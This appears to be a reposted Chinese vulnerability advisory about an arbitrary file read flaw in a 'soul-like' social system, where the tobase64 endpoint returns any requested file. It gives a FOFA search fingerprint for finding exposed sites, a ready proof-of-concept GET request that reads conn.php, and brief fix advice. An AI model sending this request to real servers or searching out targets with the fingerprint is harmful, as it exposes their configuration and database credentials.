当前位置: 首页 > article >正文

某仿soul欲音社交系统存在任意文件读取漏洞

1 阅读须知


        技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!

2 产品概述

        仿soul欲音社交系统控制器中的tobase64 方法通过传入file参数 然后通过fopen直接读取任意文件,然后输出base64编码后的文件。

3 漏洞描述


        任意文件读取漏洞(Arbitrary File Read Vulnerability)是指攻击者可以通过web应用程序读取服务器上的任意文件,而不受访问控制限制的漏洞。这种漏洞通常是由于应用程序对用户输入的验证不足、权限配置不当或代码实现缺陷所导致的。 

fofa

"/public/style/admin/js/jquery.min.js"

4.漏洞复现 

 poc

GET /api/upload/tobase64?file=conn.php HTTP/1.1
Host: 127.0.0.1
Cache-Control: max-age=0
sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="101"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36

 

5 修复建议

关闭互联网暴露面或接口设置访问权限

升级至安全版本

 

 


http://www.kler.cn/a/300004.html

相关文章:

  • leetcode 2920. 收集所有金币可获得的最大积分
  • Linux 消息队列的使用方法
  • 随机变量的变量替换——归一化流和直方图规定化的数学基础
  • Python的泛型(Generic)与协变(Covariant)
  • 探索WPF中的RelativeSource:灵活的资源绑定利器
  • ceph基本概念,架构,部署(一)
  • 重修设计模式-结构型-代理模式
  • 音视频入门基础:WAV专题(9)——FFmpeg源码中计算WAV音频文件每个packet的duration和duration_time的实现
  • flinkcdc 问题记录篇章
  • 只有IP地址没有域名怎么实现HTTPS访问?
  • 【高级编程】Java IO流(补)序列化 反序列化
  • Pyspark下操作dataframe方法(1)
  • eNUM 原理概述(VoNR VoLTE适用) eNUM 报文解析
  • Vue2使用Vue CLI学习笔记
  • python 实现kadanes卡达内斯算法
  • 基于协同过滤算法+SpringBoot+Vue+MySQL的商品推荐系统
  • 人工智能帮你管理 ADHD 的7种方法
  • [Git使用] 实战技巧
  • 建造者模式builder
  • 九月五日(k8s配置)
  • 【学习笔记】手写Tomcat 二
  • 使用Python的内置的turtle模块来绘制中秋节快乐场景
  • 每日一题 二分查找分巧克力
  • 下班后做小红书第7个月,涨粉7w,累计变现5w+,我只用到五个点
  • 微前端 - 对外只开放一个端口
  • 23. C 语言,%d 和 %i的区别